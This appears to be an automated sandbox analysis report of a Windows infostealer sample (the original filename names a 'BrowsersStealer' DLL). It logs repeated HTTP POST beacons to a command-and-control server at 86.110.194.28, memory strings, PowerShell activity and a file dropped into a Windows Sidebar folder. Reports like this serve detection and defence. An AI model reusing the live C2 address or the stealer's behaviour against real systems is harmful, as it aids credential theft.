                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
Source: unknown
HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://86.110.194.28
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://86.110.H
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://86.110.Hjj
                          Source: powershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic4%
                          Source: powershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic8
                          Source: powershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micJ
                          Source: powershell.exe, 00000006.00000002.2581210774.0000027760BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                          Source: svchost.exe, 00000013.00000002.2903834268.000001F814200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: powershell.exe, 00000001.00000002.2513469202.000001BD9BE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: powershell.exe, 00000001.00000002.2653821923.000001BDA3F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                          Source: powershell.exe, 00000001.00000002.2676516036.000001BDA4085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 
Source: powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2513469202.000001BD9BD83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://support.mozilla.org
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://www.mozilla.org
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014543000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CED000.00000004.00000800.00020000.00000000.sdmp, BUgJjFw983.16.dr, wyPcM5nqV0.16.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: wyPcM5nqV0.16.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014543000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CED000.00000004.00000800.00020000.00000000.sdmp, BUgJjFw983.16.dr, wyPcM5nqV0.16.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Window created: window name: CLIPBRDWNDCLASS

                          System Summary

Source: zZ1Y43bxxV.exe, s67.cs Long String: Length: 1057936
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Code function: 0_2_00007FFD9B8C3415
Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Code function: 0_2_00007FFD9B8B1EC3
Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Code function: 0_2_00007FFD9BA906F2
Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Code function: 0_2_00007FFD9BA90578
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B972E1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B9530E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B9630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B962E11
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9B8B3415
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9B8A1EC3
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9BA806F2
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9BA71680
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9BA80578
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9BFBE8C6
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Code function: 16_2_00007FFD9BFB92D5
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ASylWHNt.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: zZ1Y43bxxV.exe, 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs zZ1Y43bxxV.exe
Source: zZ1Y43bxxV.exe, 00000000.00000002.1692216402.0000000002490000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs zZ1Y43bxxV.exe
Source: zZ1Y43bxxV.exe, 00000000.00000002.1711995717.0000000012B46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs zZ1Y43bxxV.exe
Source: zZ1Y43bxxV.exe, 00000000.00000002.1755121506.000000001B202000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs zZ1Y43bxxV.exe
Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs zZ1Y43bxxV.exe
